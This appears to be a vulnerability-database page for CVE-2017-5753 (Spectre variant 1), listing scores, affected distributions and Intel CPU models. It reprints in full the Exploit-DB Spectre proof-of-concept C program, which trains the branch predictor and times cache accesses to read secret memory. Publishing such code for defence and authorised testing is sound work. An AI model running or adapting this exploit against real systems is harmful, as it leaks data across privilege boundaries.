CVE-2017-5753

medium

Published 2018-01-04 · Modified 2026-05-28

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

5.6

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

6.6

Description

Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.

Predictions

Exploit likelihood

91%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-43427 local multiple text · 5 KB

Multiple · 2018-01-03

Multiple CPUs - 'Spectre' Information Disclosure

text exploit Source: Exploit-DB

/*
EDB Note:
- https://spectreattack.com/
- https://spectreattack.com/spectre.pdf
- https://googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}


/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t *addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {

        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            } else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won’t get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

int main(int argc, const char **argv) {
    size_t malicious_x=(size_t)(secret-(char*)array1); /* default for malicious_x */
    int i, score[2], len=40;
    uint8_t value[2];

    for (i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3) {
        sscanf(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer */
        sscanf(argv[2], "%d", &len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
        printf("0x%02X=’%c’ score=%d ", value[0],
               (value[0] > 31 && value[0] < 127 ? value[0] : ’?’), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}

OS impact

SUSE Affected 5 releases

Version	Status	Fixed in
42.3	Affected	—
42.2	Affected	—
12	Affected	—
11	Affected	—
—	Affected	—

Ubuntu Affected 5 releases

Version	Status	Fixed in
17.10	Affected	—
17.04	Affected	—
16.04	Affected	—
14.04	Affected	—
12.04	Affected	—

Debian Mixed 7 releases

Version	Status	Fixed in
trixie	Fixed	`4.15.11-1`
sid	Fixed	`4.15.11-1`
forky	Fixed	`4.15.11-1`
bullseye	Fixed	`4.15.11-1`
bookworm	Fixed	`4.15.11-1`
9.0	Affected	—
8.0	Affected	—

Arch Fixed 1 release

Version	Status	Fixed in
—	Fixed	`4.15.1-1`

Application impact

Vendor	Product	Versions
intel	atom_z	`z3530`
intel	atom_z	`z3560`
intel	atom_c	`c2308`
intel	atom_c	`c2316`
intel	atom_c	`c2338`
intel	atom_c	`c2350`
intel	atom_c	`c2358`
intel	atom_c	`c2508`
intel	atom_c	`c2516`
intel	atom_c	`c2518`
intel	atom_c	`c2530`
intel	atom_c	`c2538`
intel	atom_c	`c2550`
intel	atom_c	`c2558`
intel	atom_c	`c2718`
intel	atom_c	`c2730`
intel	atom_c	`c2738`
intel	atom_c	`c2750`
intel	atom_c	`c2758`
intel	atom_c	`c3308`
intel	atom_c	`c3338`
intel	atom_c	`c3508`
intel	atom_c	`c3538`
intel	atom_c	`c3558`
intel	atom_c	`c3708`
intel	atom_c	`c3750`
intel	atom_c	`c3758`
intel	atom_c	`c3808`
intel	atom_c	`c3830`
intel	atom_c	`c3850`
intel	atom_c	`c3858`
intel	atom_c	`c3950`
intel	atom_c	`c3955`
intel	atom_c	`c3958`
intel	atom_e	`e3805`
intel	atom_e	`e3815`
intel	atom_e	`e3825`
intel	atom_e	`e3826`
intel	atom_e	`e3827`
intel	atom_e	`e3845`
intel	atom_x3	`c3130`
intel	atom_x3	`c3200rk`
intel	atom_x3	`c3205rk`
intel	atom_x3	`c3230rk`
intel	atom_x3	`c3235rk`
intel	atom_x3	`c3265rk`
intel	atom_x3	`c3295rk`
intel	atom_x3	`c3405`
intel	atom_x3	`c3445`
intel	atom_x5-e3930	`-`
intel	atom_x5-e3940	`-`
intel	atom_x7-e3950	`-`
intel	atom_z	`z2420`
intel	atom_z	`z2460`
intel	atom_z	`z2480`
intel	atom_z	`z2520`
intel	atom_z	`z2560`
intel	atom_z	`z2580`
intel	atom_z	`z2760`
intel	atom_z	`z3460`
intel	atom_z	`z3480`
intel	atom_z	`z3570`
intel	atom_z	`z3580`
intel	atom_z	`z3590`
intel	atom_z	`z3735d`
intel	atom_z	`z3735e`
intel	atom_z	`z3735f`
intel	atom_z	`z3735g`
intel	atom_z	`z3736f`
intel	atom_z	`z3736g`
intel	atom_z	`z3740`
intel	atom_z	`z3740d`
intel	atom_z	`z3745`
intel	atom_z	`z3745d`
intel	atom_z	`z3770`
intel	atom_z	`z3770d`
intel	atom_z	`z3775`
intel	atom_z	`z3775d`
intel	atom_z	`z3785`
intel	atom_z	`z3795`
intel	celeron_j	`j1750`
intel	celeron_j	`j1800`
intel	celeron_j	`j1850`
intel	celeron_j	`j1900`
intel	celeron_j	`j3060`
intel	celeron_j	`j3160`
intel	celeron_j	`j3355`
intel	celeron_j	`j3455`
intel	celeron_j	`j4005`
intel	celeron_j	`j4105`
intel	celeron_n	`n2805`
intel	celeron_n	`n2806`
intel	celeron_n	`n2807`
intel	celeron_n	`n2808`
intel	celeron_n	`n2810`
intel	celeron_n	`n2815`
intel	celeron_n	`n2820`
intel	celeron_n	`n2830`
intel	celeron_n	`n2840`
intel	celeron_n	`n2910`
intel	celeron_n	`n2920`
intel	celeron_n	`n2930`
intel	celeron_n	`n2940`
intel	celeron_n	`n3000`
intel	celeron_n	`n3010`
intel	celeron_n	`n3050`
intel	celeron_n	`n3060`
intel	celeron_n	`n3150`
intel	celeron_n	`n3160`
intel	celeron_n	`n3350`
intel	celeron_n	`n3450`
intel	celeron_n	`n4000`
intel	celeron_n	`n4100`
intel	core_i3	`330e`
intel	core_i3	`330m`
intel	core_i3	`330um`
intel	core_i3	`350m`
intel	core_i3	`370m`
intel	core_i3	`380m`
intel	core_i3	`380um`
intel	core_i3	`390m`
intel	core_i3	`530`
intel	core_i3	`540`
intel	core_i3	`550`
intel	core_i3	`560`
intel	core_i3	`2100`
intel	core_i3	`2100t`
intel	core_i3	`2102`
intel	core_i3	`2105`
intel	core_i3	`2115c`
intel	core_i3	`2120`
intel	core_i3	`2120t`
intel	core_i3	`2125`
intel	core_i3	`2130`
intel	core_i3	`2310e`
intel	core_i3	`2310m`
intel	core_i3	`2312m`
intel	core_i3	`2328m`
intel	core_i3	`2330e`
intel	core_i3	`2330m`
intel	core_i3	`2340ue`
intel	core_i3	`2348m`
intel	core_i3	`2350m`
intel	core_i3	`2357m`
intel	core_i3	`2365m`
intel	core_i3	`2367m`
intel	core_i3	`2370m`
intel	core_i3	`2375m`
intel	core_i3	`2377m`
intel	core_i3	`3110m`
intel	core_i3	`3115c`
intel	core_i3	`3120m`
intel	core_i3	`3120me`
intel	core_i3	`3130m`
intel	core_i3	`3210`
intel	core_i3	`3217u`
intel	core_i3	`3217ue`
intel	core_i3	`3220`
intel	core_i3	`3220t`
intel	core_i3	`3225`
intel	core_i3	`3227u`
intel	core_i3	`3229y`
intel	core_i3	`3240`
intel	core_i3	`3240t`
intel	core_i3	`3245`
intel	core_i3	`3250`
intel	core_i3	`3250t`
intel	core_i3	`4000m`
intel	core_i3	`4005u`
intel	core_i3	`4010u`
intel	core_i3	`4010y`
intel	core_i3	`4012y`
intel	core_i3	`4020y`
intel	core_i3	`4025u`
intel	core_i3	`4030u`
intel	core_i3	`4030y`
intel	core_i3	`4100e`
intel	core_i3	`4100m`
intel	core_i3	`4100u`
intel	core_i3	`4102e`
intel	core_i3	`4110e`
intel	core_i3	`4110m`
intel	core_i3	`4112e`
intel	core_i3	`4120u`
intel	core_i3	`4130`
intel	core_i3	`4130t`
intel	core_i3	`4150`
intel	core_i3	`4150t`
intel	core_i3	`4158u`
intel	core_i3	`4160`
intel	core_i3	`4160t`
intel	core_i3	`4170`
intel	core_i3	`4170t`
intel	core_i3	`4330`
intel	core_i3	`4330t`
intel	core_i3	`4330te`
intel	core_i3	`4340`
intel	core_i3	`4340te`
intel	core_i3	`4350`
intel	core_i3	`4350t`

References

CWEs

CWE-203

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.